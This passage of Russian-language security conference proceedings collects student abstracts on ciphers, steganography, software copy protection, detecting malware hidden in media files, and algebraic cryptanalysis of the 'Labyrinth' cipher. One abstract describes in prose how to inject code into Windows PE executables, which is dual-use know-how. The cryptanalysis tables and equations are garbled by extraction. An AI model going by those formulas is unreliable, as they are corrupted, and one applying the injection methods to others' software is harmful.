следующая последовательность действий с каждым из возможных маршрутов: организовывается структура соединений защиты (с количеством уровней защиты до 16) по принципу вложения и непересечения; проверяется, удовлетворяет ли маршрут со ССЗ требованиям по ВВХ; вычисляем задействованный ресурс на организацию ССЗ. Окончательно выбирается тот маршрут, который будет удовлетворять требованиям по ВВХ, заданному пользователем уровню конфиденциальности и запрашивать минимальное количество ресурсов. В результате синтеза этих алгоритмов при помощи организации параллельных соединений с вложениями, возможно обеспечить требуемую пользователем степень целостности и конфиденциальности, которую он задает с помощью задания по безопасности (ГОСТ Р ИСО/МЭК 15408-2002). Данные алгоритмы предназначены для реализации на уровне инфраструктуры и плоскости конечного пользователя в рамках модуля 3 (в соответствии с рекомендацией МСЭ-Т Х.805).
IT security conference for the next generation
31
Шифр многозначной замены Кудияров Д. Российский государственный социальный университет Москва, Россия
[email protected] 1. Цель научной работы: Разработка программного обеспечения для демонстрации криптографического метода защиты текстовой информации методом многозначной замены. 2. Методы проведенных исследований: Анализ литературных источников по использованию классических криптографических методов защиты информации; выбор алгоритма для криптографических преобразований и разработка программного продукта на языке Visual C++.Net. 3. Основные результаты научного исследования (научные, практические): Разработана программа Multiciphered Substitution, предназначенная для защиты текстовой информации. Алгоритм основан на замене символов алфавита открытого текста одним или несколькими символами алфавита закрытого текста. Замена одного знака несколькими приводит к изменению частот встречаемости символов в закрытом тексте, что затрудняет статистический анализ. 4. Наличие документа об использовании научных результатов: Программное обеспечение используется в учебных целях для проведения лабораторных работ по курсу ―Криптографические методы и средства защиты информации‖ для студентов специальности 090104.
Методика использования ПСКЗИ «Шипка» для построения криптографической системы защиты информации в банковской сфере Макарян А.С. Кубанский Государственный Технологический Университет Краснодар, Россия
[email protected] Аннотация: научная работа по разработке методики использования персонального средства криптографической защиты информации в системе криптографической защиты информации банка. В работе проанализированы возможности устройства, его архитектура и функциональные особенности, а именно работа с ключами. Также проанализированы нормативные документы по информационной безопасности в банках. Сделаны выводы, даны рекомендации по использованию. В данной работе преследовалась цель использования ПСКЗИ «Шипка» для построения криптографической системы защиты информации в банковской сфере. Первоочередной задачей было рассмотрение и сопоставление архитектуры и характеристик устройства с требованиями, предъявляемыми нормативными документами по защите информации в банковской сфере, а именно стандартом банка России «Обеспечение информационной безопасности организаций банковской системы Российской Федерации». Второй немаловажной задачей являлась разработка методики применения ПСКЗИ «Шипка» для построения криптографической системы защиты информации в банковской сфере, которая включает в себя конкретные инструкции по использованию устройства. Данная методика была разработана, и в инструкциях была подробно описана работа с криптографической частью ПСКЗИ «Шипка», а именно работа с ключами. Актуальность данной работы не вызывает сомнения, так как она направлена на повышение информационной безопасности в банковской сфере, где стабильная система безопасности всегда актуальна и очень важна. Ну а применение разработок работы на практике осуществимо без особого труда. И с помощью данной методики можно строить криптографическую систему защиты информации, полностью соответствующую требованиям нормативных документов в банковской сфере, что на сегодняшний день является одним из главных критериев использования средств защиты информации в банках.
IT security conference for the next generation
32
Криптографическая защита текстовой информации большого объѐма Остапов Д.С. Кубанский Государственный Технологический Университет Краснодар, Россия
[email protected] В данный момент криптография очень актуальна, так как она позволяет защитить секретные данные от несанкционированного просмотра. Целью данной работы является написание программы, обеспечивающей криптографическую защиту текстовой информации большого объѐма. Существуют разные алгоритмы шифрования. Программа обеспечивает криптографическую защиту текстовой информации по простому алгоритму, который обеспечивает низкую криптостойкость, но скорость шифрования высока, и по алгоритму RSA, который обеспечивает высокую криптостойкость, но скорость шифрования невысока. Простое шифрование осуществляется с помощью многочисленных перестановок букв и изменения кодировок символов. Для RSA шифрования необходимо определить открытый и секретный ключи. Открытый ключ используется при шифровании, секретный при дешифровании. Открытый ключ, как и секретный, состоит из пары чисел. Если открытый ключ (E;N), а секретный (D;N), то числа, полученные из кодоривок символов, при шифровании будут возводиться в степень E и делиться по mod N, при дешифровании - возводиться в степень D и делиться по mod N.
Комплексная защита программного обеспечения от несанкционированного использования и копирования Даниелян В. М. Соавтор: Овсепян Е. Р. Государственный Инженерный Университет Армении (Политехник) Ереван, Армения
[email protected] Аннотация Представлены цели разработчиков программного обеспечения и противопоставлены им цели взломщиков. Приведено описание базовых методов защиты программного обеспечения (ПО), их сильные и слабые стороны. Предложен механизм, обеспечивающий доказательство авторских прав производителя ПО и защиту ПО от несанкционированного использования и модифицирования, основанный на внедрении и сокрытии информации в исполняемый файл (PE) с параллельным использованием криптографических и парольных методов защиты. Введение В настоящее время существует множество защитных алгоритмов и методов, которые отличаются как технологией обеспечения защиты, так и степенью защищенности. Вместе с тем отмечается, что практически любой механизм защиты хотя бы теоретически можно взломать или обойти. И, следовательно, адекватным можно считать тот механизм, на взлом которого потребуется намного больше затрат времени и средств, чем на легальную покупку программного обеспечения. Вполне естественно, что многие защитные механизмы со временем теряют свою актуальность в связи с совершенствованием способов хакерских атак и применяемого программного обеспечения. В связи с этим представляется актуальной разработка новых, более совершенных методов защиты, в частности, основанных на комплексном использовании нескольких принципиально различных защитных алгоритмов. При этом особый интерес могут представлять малоизученные методы стеганографической защиты, которые призваны скрыть от противника сам факт наличия механизмов защиты и тем самым исключить провоцирование противника на активные хакерские действия.
IT security conference for the next generation
33
Целью настоящей работы является разработка средств комплексной защиты программного обеспечения от несанкционированного использования и копирования путем скрытого встраивания механизмов защиты. Для достижения указанной цели в работе ставятся и решаются следующие задачи: анализ существующих методов защиты ПО и выбор наиболее эффективных из них, в том числе, с точки зрения возможности комплексного использования; разработка механизмов объединения и комплексирования выбранных методов защиты ПО; разработка средств стеганографической защиты ПО; разработка программных средств скрытого встраивания механизмов защиты в существующие файлы ПО без нарушения их характеристик и функциональных свойств. Базовые методы защиты ПО Как базовые, для создания комплексного механизма для защиты ПО, рассмaтриваются следующие методы: Парольная защита Парольная защита – пожалуй, самая распространенная защита для программного обеспечения. Основная задача автора защитного механизма, основанного на пароле – как спрятать эталонный пароль или как спрятать механизм сравнения эталонного пароля с введенным. Эталон может быть спрятан в разных местах- как в самой программе, так и вне ее (в отдельном файле или в системных областях). Способами для усложнения взлома защит основанных на паролях являются: Необходимо всеми способами увеличить время, за которое может быть произведен полный перебор (например, пустить задержку в несколько секунд между каждым введением пароля и тд.). Mожно использовать защиту, где пароль или хеш-функция пароля является ключом для шифрования некоего кодового блока. В этом случае после получения всех возможных паролей злоумышленнику придется производить дешифрацию кода. Для защиты от атак по словарю необходимо правильно выбирать сам пароль, использовать и верхний и нижний регисторы и обеспечивать нормальную длину пароля. Криптография Криптография используется для защиты программного обеспечения от нелегального использования, модификации, а также от исследования логики работы защитного механизма. Несмотря на то, что криптография - это очень глубoко исследованная наука, настолько же глубoко исследовано понятие криптоанализа. Криптоанализ объединяет методы, алгоритмы, средства дешифрования, а также оценку стойкости криптосистем. Для оптимизации защитных механизмов на основе шифрования можно использовать следующие хитрости: Использование поблочной дешифрации, то есть дешифрацию кода производить по блокам и в таком случае весь программный код не будет находится в памяти полностью. Взаимозависимое шифрование. Создать механизм шифрования, где ключ для шифрования каждого блока кода будет являться функцией от другого блока или от него самого. Следует комбинировать использование методов шифрации с открытым ключом и с закрытым. Использование хеш-функций, к примеру для хранения эталонных паролей и т. д. Стеганография На сегодняшний день использование нелицензионного программного обеспечения наносит значительный экономический ущерб компаниям, его производящим. Для предотвращения такого использования существуют различные программные и аппаратные средства и методы защиты. Среди них известны методы цифровых водяных знаков (Watermarks) и отпечатков пальцев (Fingerprintings). Цифровые водяные знаки получили свое название по аналогии с водяными знаками, применяемыми в денежных банкнотах и других ценных бумагах. Они представляют собой специальные метки, внедряемые в файл, в цифровое изображение или цифровой сигнал в целях контроля авторского права. А суть цифровых отпечатков пальцев состоит в том, что в защищаемый файл вносятся такие изменения, которые могли бы однозначно идентифицировать каждую копию. С помощью компютерной стеганографии можно скрыть данные в разных типах файлов, в том числе и в исполняемых. Для внедрения и сокрытия информации в исполняемые файлы необходимо понимать их структуру. Формат PE – это основной формат исполняемых файлов приложений в 32 и в 64разрядных системах Microsoft Windows.
IT security conference for the next generation
34
Данные во многих полях PE файла не используются загрузчиками и, в случае изменения этих данных, не приведут к неисправности файла. Используя именно эти поля, можно реализовать защиту авторских прав на основе цифровых водяных знаков и отпечатков пальцев. Максимальный размер скрытой информации, которую можно внедрить в исполняемый PE файл, при этом не нарушая PE формат, это 50 байтов. В том случае, если внедряемая информация имеет обьем больше 44-50 байтов (к примеру исполняемый код программы,защитного механизма и т. д.), то можно воспользоваться одним из нижеперечисленных методов. Скрыть исполняемый код, внедрив его в PE файл можно несколькими методами: Внедрение в заголовок Между окончанием таблицы секции и первой секцией есть промежуток, появившийся из-за файлового выравнивания (значение FileAlignment в файловом заголовке). Туда можно внедрить код. Но недостаток в том, что место там очень мало и это приводит к тому, что или внедряемый код должен быть очень мал, или сюда внедряется лишь его часть. А преимуществом этого способа является неизменность размера файла. Запись в конец последней секции Этот способ хорош тем, что можно внедрять сколько угодно кода. Но и одновременно увеличивается размер файла. Способ заключается в простом добавлении кода в конец последней секции с изменением параметров данной секции. Добавление новой секции Внедрение кода с помощью этого способа тоже увеличивает размер файла. Способ заключается в создании новой секции (в таблице секций) и записи внедряемого кода по нужному файловому смещению. Кроме этих способов можно внедрить данные в PE файл, просто записав их в конец самого файла, но если эти данные являют собой исполняемый код, то этот способ не подходит, так как данные, записанные в конец файла, не влияют на функциональность PE файла. Комплексная система защиты программного обеспечения В защитном механизме использованы методы парольной защиты, криптографии (хешфункции, динамическое шифрование, поблочное дешифрование) и стеганографии (сокрытие защитного механизма в исполняемом файле, сокрытие цифровых водяных знаков в неиспользуемых полях PE файла). Сам защитный механизм основан на внедрении в исполняемый PE файл модуля, исполняющего сравнение введенного и эталонного паролей, модуля, проверяющего целостность цифровых водяных знаков и отпечатков пальцев и дешифратора, который производит расшифровку вышеуказанных модулей. ПО, обработанное с помощью данного механизма, будет защищено от модификации, несанкциoнированного использования и, в случае распространения нелегальной копии, возможно доказательство авторских прав разработчиков. Полученный механизм имеет все приемущества базовых методов защиты ПО, но более устойчив к методам их взлома, поскольку обойти одну защиту намного легче, чем обойти защиту, комбинированную из нескольких методов. Создан программный инструмент, с помощью которого можно защитить любой файл PEформата. Используя гибкую систему опций, можно отдельно использовать парольную защиту программы или стеганографическую защиту авторских прав, а также, в зависимости от пожеланий, зашифровать оба этих механизма или только тот, который используется.
IT security conference for the next generation
35
Обратные стеганографические алгоритмы в задачах обнаружения вредоносных кодов Ершов Д.И. Новосибирский Государственный Архитектурно-Строительный Университет (Сибстрин) Новосибирск, Россия
[email protected] Вопрос о сокрытии одного файла в другом с точки зрения технологии программирования является известной проблемой. В частности, здесь широко применяются методы пустот для упаковки одного растрового изображения в другое. Отметим, что аналогичные методы могут быть применены как для видео, так и для аудиофайлов. В настоящее время существуют утилиты, позволяющие соединять вместе коды двух различных программ, например, классическим представителем такого рода инструментов является компрессор исполняемых файлов ASPack. Наибольший интерес представлял тот факт, что в обыкновенном, безобидном bmp- или wav-файле возможно сокрыть сигнатуру любого, даже довольно опасного вируса. Построение схемы для анализа файлов на наличие в них скрытых вредоносных кодов и стало задачей, рассматриваемой в данной работе. Говоря об актуальности подобного исследования, можно заметить, что нет абсолютно никаких видимых преград тому, чтобы внедрять в самые обыкновенные личные фотографии и музыкальные записи сигнатуры троянов или MDKiller’ов, и именно поэтому нельзя закрывать глаза на подобные угрозы. В процессе проведения исследования были подробно изучены самые разнообразные схемы внедрения в структуру медиафайлов. В результате были выделены основные этапы их заражения. Однако, несмотря на это, построение действительно надежных систем детектирования подобных угроз является непростой задачей. И все же результаты работы в этой области также нескудны: разработан алгоритм обнаружения скрытых сигнатур, применимый для довольно широкого класса методов заражения.
IT security conference for the next generation
36
Алгоритм симметричного криптографического преобразования на базе биграммного шифра «двойная пирамида» Евстратов Л. Г. Соавтор: Чичиков А. А. Пятигорский Государственный Лингвистический Университет Пятигорск, Россия
[email protected] В современном обществе немаловажное значение приобрела наука шифрования, причем не только в военной, но и во вполне гражданских сферах. Изобретение открытых систем шифрования перевернуло мир криптологии, так же как в свое время изобретение колеса перевернуло ход истории. Однако актуальность шифрования закрытым ключом все еще сохраняется в тех сферах, где необходимо скрыть данные, не передавая кому-либо. Или, говоря по-другому, обеспечить им безопасное локальное хранение. Также можно шифровать закрытым алгоритмом сообщения адресату, а открытым ключ, для обеспечения быстрого взаимодействия, ведь известно, что шифрование открытым ключом требует ресурсоемких арифметических операций. Еще одной стороной проблемы является то, что права на использование самых известных и эффективных алгоритмов шифрования, принадлежат не менее известным организациям, и использование их в коммерческих целях может быть сильно ограничено или запрещено. Следовательно, еще одна дешевая или бесплатная альтернатива крупным продуктам никогда не будет лишней, особенно если она обеспечивает надлежащий уровень криптостойкости. Ну и, конечно же, авторы считают, что прогресс никогда не должен останавливаться, даже если он движется медленно. В данной работе описан алгоритм шифрования, «названный двойная пирамида» из-за особенности его функционирования (две таблицы символов располагаются друг напротив друга в виде пирамиды). Цели работы: продемонстрировать, что развитие криптографии не ограничилось существующими распространенными системами шифрования; создать закрытый алгоритм шифрования, нетребовательный к вычислительным ресурсам процессора; обеспечить максимальную возможную криптостойкость системы; Таким образом, система, созданная на основе данного алгоритма, должна и сможет соответствовать требованиям, предъявляемым к продуктам, обеспечивающим уровень криптостойкости выше среднего.
IT security conference for the next generation
37
Криптографические методы защиты информации Пепина М.А. ГОУ СПО (ССУЗ) «Рузаевский политехнический техникум» Рузаевка, Россия
[email protected] Криптография - наука о методах обеспечения конфиденциальности (невозможности прочтения информации посторонним) и аутентичности (целостности и подлинности авторства, а также невозможности отказа от авторства) информации. Криптография занимается поиском и исследованием математических методов при образовании информации. В своей работе я исследовала различные шифры кодирования. В этой работе я наглядно привела все аргументы, фотографии и расчеты, доказывающие преимущество криптографии. Актуальность темы состоит в том, что криптография проникает во все области. В ходе исследования я решала следующие задачи: 1. Привела примеры на каждый шифр замены; 2. Написала алгоритм RSA; 3. Просмотрела при помощи программ Crypt & DeCrypt и Crypt Info, как кодируется сообщение. Криптография зарекомендовала себя как надежный и мощный источник шифрования, благодаря этому прочно укрепила свои позиции в сфере кодирования данных, защиты информации от несанкционированного прочтения другими пользователями. По всему миру используется несколько десятков тысяч программ, с помощью которых осуществляется данная процедура. Нам, молодому поколению, нужно знать о новейших возможностях, как защитить нужную информацию от чужого взора и уметь использовать их в дальнейшем в учебной, научной и практической деятельности.
IT security conference for the next generation
38
Реконфигурируемая стеганографическая система для безопасного и длительного хранения данных Хачатуров А.Г. Государственный Инженерный Университет Армении (Политехник) Ереван, Армения
[email protected] Аннотация Предложена реконфигурируемая стеганографическая система, позволяющая создавать скрытое пространство безопасного и длительного хранения данных в локальных и глобальных сетях, в частности, в Интернете. Предложен механизм разделения секрета, обеспечивающий длительное хранение и однозначное восстановление данных. Приведено описание схем получения новых и восстановления потерянных частей секрета без восстановления самого секрета. На сегодняшний день, в связи с широким распространением доступности Интернета и ряда других технологий, параллельно растет угроза потери, компрометации и целенаправленных атак на данные, которые должны оставаться закрытыми, находясь в сети и, в частности, в Интернете. Стеганография является одним из наиболее эффективных средств защиты цифровой информации. Стеганография - это наука, связанная с созданием математических методов и средств защиты информации, обеспечивающих конфиденциальность, целостность и ряд других функций. Строго говоря, стеганография изучает способы, с помощью которых производится сокрытие самого факта передачи информации. Обеспечение целостности, достоверности и доступности информации – важные составные успеха деятельности любой организации. Формула успеха любой деятельности гласит: “кто владеет достоверной и полной информацией – тот владеет ситуацией, кто владеет ситуацией – тот способен управлять ею в своих интересах, кто способен управлять – тот способен побеждать”. Современные стеганографические системы позволяют скрывать секретную информацию в изображениях или иных цифровых объектах, которые могут находиться на локальном компьютере, в локальной сети или Интернете. При этом Интернет может рассматриваться как наиболее подходящая среда для скрытого хранения и передачи секретной информации. В качестве средств хранения и передачи секретной информации в Интернете предполагается использовать электронную почту и публичные веб-страницы. Вместе с тем, в качестве основного недостатка подобного хранения и передачи секретной информации можно отметить риск повреждения или удаления стеганографических файлов, вследствие целенаправленного воздействия противника или ―естественных‖ причин, таких как закрытие или реорганизация соответствующих веб-страниц (почтовых ящиков) и др. Одним из подходов к решению указанных проблем могут являться реконфигурируемые стеганографические системы. Основная идея реконфигурируемой стеганографической системы состоит в следующем: скрываемая информация разделяется между N контейнерами с использованием в качестве параметра разделения псевдослучайного значения. с определенной периодичностью восстанавливается скрытая информация на основе M неповрежденных контейнеров и вновь осуществляется разделенное сокрытие. Иными словами, производится периодическое обновление скрываемой информации. При этом для обеспечения достаточного уровня защищенности системы M должно быть меньше чем N. Важно отметить, что использование при разделении псевдослучайного значения приводит к тому, что новые составляющие секрета отличаются от предыдущих (до обновления). Таким образом, добытые противником составляющие после обновления перестают быть полезными для продолжения атаки на стеганографическую систему. Иными словами, безопасность системы будет нарушена только в случае, если в промежутке между обновлениями противнику удастся захватить не менее M контейнеров и извлечь из них скрытые данные. В качестве файлов носителей могут использоваться различные файлы (изображение, звук, видео и т.д.), а для восстановления секрета необходимо наличие как минимум М частей, причем M≤N. Построенная на основе такого подхода стеганографическая система может, по существу, эмулировать централизованную систему, в которой секретные данные скрываются в одном файле, и обеспечивать безопасность и невидимость секретных данных до тех пор, пока не более M-N контейнеров будут изменены, повреждены или удалены. Такой подход может значительно повысить защищенность по отношению к большинству
IT security conference for the next generation
39
возможных атак на стеганографическую систему за счет того, что скрытые в отдельном контейнере данные представляют собой бессмысленный набор символов. Для успешного функционирования стеганографической системы, построенной на основе приведенных принципов реконфигурации необходимо иметь адекватные средства определения неизменности контейнеров, которые в простейшем случае могут базироваться на идее контроля целостности с применением хеш-функций. При этом очевидно, что система не должна ожидать, пока определенное количество контейнеров будут изменены или удалены, а должна с заданной периодичностью производить самовосстановление независимо от активности противника. Подобная реконфигурируемая стеганографическая система за счет обоснованного выбора периода самовосстановления может, по крайней мере, теоретически, обеспечить сколь угодно долгое безопасное сокрытие секретной информации. Вместе с тем, такой подход, совместно с идеей ассиметричной стеганографии, может являться основой для создания скрытой операционной среды для коллективного взаимодействия с сохранением высокой степени конфиденциальности. В связи с этим была поставлена цель создать программное средство, с помощью которого стало бы возможным создание скрытого пространства хранения данных в локальных или глобальных сетях, в частности, в Интернете. В результате создана реконфигурируемая стеганографическая система, которая основывается на трех основных методах – реконфигурируемой стеганографии, адекватном средстве получения новых и восстановления потерянных частей секрета без восстановления самого секрета, перераспределении частей разделенного секрета. Структура системы состоит из четырех основных компонентов: администратор, пользователи, противники и группа стеганографических контейнеров (файлы-носители), которые хранятся в Интернете. Пользователи выполняют первоначальное распределение и заключительную реконструкцию файлов (т.е. секретов). Противники пытаются обнаружить факт существования стеганографического хранения данных и, если они имеют успех, восстановить скрытый секрет и нарушить нормальную работу системы. В функции администратора входят размещение частей секрета в файлы-носители и выполнение перераспределения. Хотя число файлов-носителей, в которых хранятся данные, может быть очень большим, предполагается, что число файлов носителя N, в которых хранятся части разделенного секрета, является относительно маленьким. Таким образом, администратор должен обеспечить закрытую связь между пользователями и соответствующими файлами носителя. Алгоритм распределения секрета основывается на пороговой схеме разделения секрета Шамира. Данная схема позволяет разделять информацию между выбранным количеством пользователей, и, при наличии определенного количества частей, однозначно восстановить информацию. В качестве примеров секретной информации приводятся обыкновенные числа для наглядной иллюстрации работы алгоритма. Также описывается схема проверки истинности полученных частей разделенного секрета и предусмотрена возможность вычисления новых частей секрета без восстановления самого секрета. Эта схема позволяет получить новые части секрета только тем пользователям, которые являются хранителями уже имеющихся частей разделенной информации. В случае потери одной из частей секрета в системе предусмотрена схема восстановления потерянной части без восстановления секрета. Обобщая вышеперечисленное, можно сделать заключение о том, что данная система является эффективным средством для защиты информации как для специалистов в области защиты информации, так и для обычных пользователей, которые не обладают специализированными знаниями. Позволяет создавать скрытое пространство в Интернете для безопасного и длительного хранения данных, позволяет противостоять разным типам атак, таких как изменение или удаление файлов-носителей.
IT security conference for the next generation
40
Алгебраический анализ перспективного блочного алгоритма «Лабиринт» Казимиров А.В. Харьковский Национальный университет радиоэлектроники Харьков, Украина
[email protected] В настоящее время на Украине проводится открытый конкурс блочных симметричных шифров (БСШ) с целью определения алгоритма-прототипа национального стандарта шифрования. Одним из основных требований к перспективному шифру является высокий уровень стойкости к различным видам криптоаналитических атак, одновременно с обеспечением необходимой производительности. Среди участников открытого конкурса представлен и шифр «Лабиринт», разработанный в ЗАО «Криптомаш». Криптоанализ этого алгоритма необходим для реальной оценки стойкости шифра и его дальнейших перспектив в конкурсе. В основе рассматриваемого алгоритма шифрования лежит цепь Фейстеля. В остальных конструктивных особенностях структура «Лабиринта» схожа со структурой шифра, принятого в качестве американского стандарта Advanced Encryption Standard (AES, FIPS PUB 197). Учитывая, что по результатам публикаций в открытой печати этот алгоритм является наиболее исследованным с точки зрения криптографических свойств и стойкости, целесообразно применить ряд предложенных для AES атак и для алгоритма «Лабиринт». Одним из наиболее перспективных методов криптоанализа симметричных систем в настоящее время является алгебраическая атака. Этот метод позволяет описать всѐ шифрующее преобразование в виде одной системы уравнений, причѐм из-за особенностей построения S-блока AES (который одновременно является единственным нелинейным преобразованием во всѐм алгоритме) степень такой системы равна 2. Было предложено использовать алгебраическую атаку на шифр. Основным нелинейным преобразованием в алгоритме является S-блок, поэтому в первую очередь был выполнен анализ именно этого компонента. Пусть X = {x7, x6, x5, x4, x3, x2, x1, x0} – байт, подающийся на вход S-блока, а Y = {y7, y6, y5, y4, y3, y2, y1, y0} - байт на выходе S-блока. В большинстве случаев при анализе свойств S-блока рассматривается функциональная зависимость выходных значений битов от входных следующего вида: yl f l x7 , x6 ,, x0 , l 0,1, 7 . Для большинства современных шифров, включая «Лабиринт», степень такого уравнения равна 7. Тем не менее, используя более общий вариант описания S-блока системой уравнений, где используются все входные и выходные переменные, можно получить более низкую степень. Более того, в большинстве случаев такая система оказывается переопределѐнной. Один из алгоритмов поиска системы переопределѐнных уравнений предполагает построение матрицы, описывающей все возможные значения термов для всех вариантов входных переменных. Для k битов на входе матрицы еѐ размерность составляет p 2 k C i , где 2 k i0 n число сочетаний, Cm
p - максимальная степень терма матрицы. Соответственно, первый индекс элемента матрицы определяет вариант входа S-блока. Второй – номер терма, который включает все возможные комбинации входных и выходных переменных вплоть до степени p. Так для p=2 строка матрицы будет включать в себя все комбинации второй степени, первой степени и константу 1: { 1, x7, ... , x0, y7, ... , y0, x7x6, x7x5, ... , x1x0, x7y7, x7y6, ... , x0y0, y7y6, y7y5,…, y1y0 }.
IT security conference for the next generation
41
2 C 8
2 16
Соответственно, для S-блока шифра «Лабиринт» размерность матрицы имеет вид
16 1 , т.е. 256 137 . Фрагмент построенной матрицы приведен в таблице 1.
1
№ 7
x
…
0
7
x
y
…
0
7
y
x . .
x 6
.
x
…
x
x
y
1
7
0
7
1
x
y
y
y
y
0
7
0
6
…
y
0
0
1
0
…
0
0
…
1
0
…
0
0
…
0
0
…
1
1
1
0
…
1
1
…
0
0
…
0
0
…
0
1
…
0
2
1
0
…
0
1
…
0
0
…
0
0
…
0
1
…
0
…
…
…
…
…
…
…
…
…
…
…
…
…
…
…
…
2
1
1
…
1
0
…
1
…
1
0
…
1
0
…
1
1
5 5 Таблица 1. Фрагмент матрицы значений термов степени не выше 2 для описания S-блока шифра «Лабиринт». Полученная матрица используется для построения переопределѐнной системы уравнений, а именно применение NullSpace-преобразования к данной матрице позволит найти систему уравнений, описывающую S-блок. Для описания S-блока алгоритма шифрования «Лабиринт» была получена переопределѐнная система из 39 уравнений, некоторые из которых приведены ниже. 1 + x 7 + x 4 + x 2 + y 7 + y 6 + y 3 + y 2 + y 0 + x 7 x 6 + x 7 x 5 x 7 x 3 + x 7 x 0 + x 6 x1+x 6 x 0 + x 5 x 4 + x 4 x 3 x 4 x1 + x 4 x 0 + x 3 x 0 + x1x 0 + x 7 y 6 +x 7 y 3 + x 7 y 2 + x 7 y 0 + x 6 y 7 x 6 y 5 + x 6 y 4 + x 6 y 3 + x 6 y 2 + x y + x y + x y + x y x y + x y + x y + y y + y y + y y + y y + y y + y y 5 6 5 5 5 4 5 0 4 7 4 2 4 0 7 6 7 4 6 5 6 3 6 1 6 0 y 5 y 2 + y 5 y1 + y 2 y 0 = 0 x 7 + x 4 + x1 + y 6 + y 4 + y1 + x 7 x 5 + x 7 x 4 + x 7 x 2 + x 6 x 5 + x 6 x 4 + x 6 x1 + x 6 x 0 x 5 x1 + x 4 x 3 + x x + x x + x x + x x + x x + x y + x y + x y + x y + x y + x y + x y + x y 7 5 7 2 7 0 4 2 4 0 3 0 2 1 2 0 6 7 6 5 6 4 6 3 6 1 x 5 y 3 + x 5 y 2 + x 5 y1 + x 5 y 0 + x 4 y 7 + x 4 y 6 + x 4 y 5 + y 7 y 3 + y 7 y1 + y 6 y 4 + y 6 y 3 + y 6 y 2 + y 6 y 0 + y y + y y + y y + y y = 0 5 2 5 1 4 3 2 1 1 + x 7 + x 3 + x 1 + x 0 + y 6 + y 3 + y1 + y 0 + x 7 x 6 + x 7 x 3 + x 6 x 0 + x 5 x 4 + x 4 x 3 x 4 x 2 + x 4 x1 + x 4 x 0 + x x + x x + x x + x y + x y + x y + x y + x y + x y + x y + x y + x y + x y + 7 3 5 7 5 3 5 0 6 5 6 4 6 2 6 1 6 0 4 6 2 1 2 0 1 0 x 4 y 5 + x 4 y 4 + x 4 y 3 + x 3 y 7 = 0
Необходимо отметить, что уравнения справедливы для всех входных наборов, и при этом максимальная степень системы равна 2; для обратного S-блока аналогично получается переопределѐнная система из 39 уравнений, что в совокупности даѐт 39 2 78 уравнений. S-блок в алгоритме «Лабиринт» имеет алгебраическую структуру, которая аффинно эквивалентна конструкции Ниберг-Динга:
S ( X ) M Y M X X V X
E
VY ; B
X , V X , VY F28 ; M X , M Y GL(8, F2 ); E 28 1 2 t , 0 t 8, где B – некоторый базис над GF( 28 ), определяется образующим (неприводимым) полиномом 8-й степени;
IT security conference for the next generation
42
E – показатель степени; MX, MY – квадратные невырожденные матрицы размерностью (8х8). Пусть Z M Y1 S ( X ) YY , Z 1 M X X Y X . Тогда Z Z 1 1 . Последнее соотношение и даѐт нам дополнительные 7 уравнений, которые справедливы для всех входов и выходов S-блока. Дальнейшие исследования показали, что возможно расширить построенную систему на цикловую функцию шифра «Лабиринт» (рис. 1), 16 циклов шифрования и на начальное и конечное преобразование.
Рисунок 1. Модифицированная цикловая функция шифра «Лабиринт». Анализ полной версии шифра показал, что алгоритм шифрования с измененными параметрами можно описать при помощи системы, состоящей из 16800 уравнений с 1664 переменными. Решение данной системы позволит найти ключи шифрования, зная всего несколько входных и выходных сообщений.
IT security conference for the next generation
43
Нейросетевой подход к шифрованию информации Канунников Д.С. Курский государственный университет Курск, Россия
[email protected] Аннотация: В данной статье сделана попытка применения искусственной нейронной сети к шифрованию информации. Приводится детальное описание алгоритма. Указаны правила формирования нейросети. На данный момент известно множество различных областей применения искусственных нейронных сетей: в медицине, экономике и др. За последние годы нейросети нашли своѐ место и в криптографии. И число приложений в этой области только растѐт. И это неудивительно – потребности в безопасных способах выполнения, например, экономических, финансовых операций в условиях жѐсткой конкуренции порождают не только исследование новых способов защиты конфиденциальных данных, но и увеличение скорости выполнения действий, средств по обеспечению этой защиты. Предложим ещѐ один способ шифрования данных, непосредственно основанный на нейросетевом подходе. Для этого рассмотрим искусственную нейронную сеть, представляющую собой довольно распространѐнный тип – многослойный персептрон. Определим для данного персептрона три слоя вычислительных элементов – нейронов (математических нейронов МаккалокаПиттса), которых в каждом из этих слоѐв будет одинаковое количество. Например, пусть в каждом слое будет по 8 нейронов. Впоследствии исходное сообщение, предназначенное для шифрования, разбивается на блоки, длина которых соответствует данному количеству нейронов. Для расчѐта выходов нейронов будем применять сигмоидальную функцию активации. Первый, или входной, слой не выполняет каких-либо вычислительных операций. Его главная и единственная задача – распределение входных сигналов (компонент входного вектора) по нейронам второго, или скрытого, слоя. Основная «нагрузка» по обработке поступившей информации лежит на скрытом и выходном слоях. Когда на вход нейросети поступает вектор входных сигналов, нейроны входного слоя распределяют эти сигналы по входам нейронов скрытого слоя. Затем рассчитываются взвешенные суммы поступивших сигналов. В силу непрерывности и монотонности выбранной функции активации можно без особых усилий выявить по полученному выходу сети аргументы функций активации выходного слоя. Это обусловлено существованием обратной функции к функции активации. Все параметры сети, такие как используемые модели нейронов, их количество, функции активации, структура связей между нейронами во всех слоях, весовые коэффициенты входов всех нейронов, а также правило формирования шифротекста предполагаются общедоступными. Таким образом, получив из выхода сети аргументы функций и зная весовые коэффициенты, можно рассчитать сигналы, поступившие на входы нейронов выходного слоя. И так далее вплоть до входа сети. То есть, нужно найти решение неоднородной системы линейных алгебраических уравнений, которое, в соответствии с теоремой об общем решении неоднородной системы, будет существовать и будет единственно при условии совпадения ранга основной матрицы с числом неизвестных переменных. Поэтому наложим требование, чтобы весовые коэффициенты выбирались таким образом, чтобы ранг составленной из них матрицы совпадал с числом поступивших сигналов. Тогда мы можем гарантировать, что процесс преобразования входного вектора обратим и обратим однозначно. Теперь введѐм в рассмотрение кортеж действительных чисел, вектор, который назовѐм ключом. Для того чтобы по выходу нейронной сети было невозможно, ну или, хотя бы, достаточно непросто вычислить исходный вектор поступивших на вход сети сигналов, прибавим к взвешенным суммам нейронов среднего, скрытого слоя компоненты введѐнного ранее секретного ключа. И именно эти суммы теперь будут служить в качестве аргументов функций активации нейронов среднего слоя. Теперь получить вход сети, не зная секретный ключ, будет не так просто, так как такая задача сводится к подбору компонент вектора-ключа из множества действительных чисел. Выходные блоки, соответствующие входным блокам, записываются слитно и последовательно в порядке поступления блоков на вход сети. Итоговая последовательность, строка, и будет представлять собой криптограмму, шифротекст. На этом простом правиле и основан предложенный алгоритм шифрования информации. Процесс расшифрования заключается в вычитании компонент ключа из аргументов функций активации, вычисленных для среднего слоя нейронов в процессе восстановления исходного открытого текста. IT security conference for the next generation
44
